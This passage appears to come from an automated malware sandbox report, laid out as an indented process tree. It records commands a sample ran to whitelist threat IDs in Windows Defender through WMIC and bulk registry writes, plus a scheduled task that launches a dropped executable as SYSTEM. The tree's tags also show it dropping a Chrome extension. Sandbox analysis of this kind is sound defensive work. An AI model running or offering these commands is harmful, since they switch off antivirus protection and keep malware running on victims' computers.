                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:15432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:15632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:15796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:16520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:15252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:15200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:17164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:15692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:17036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:18416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:18756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:16928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:17284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:17508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:17904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:17984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:16264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:17940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:18224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:18496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:18532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:18596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:19044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:17892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:19356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 00:26:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe\" 4h /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /run /I /tn "wovemSUpOFDwVyMam"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:18828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe 4h /site_id 668658 /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
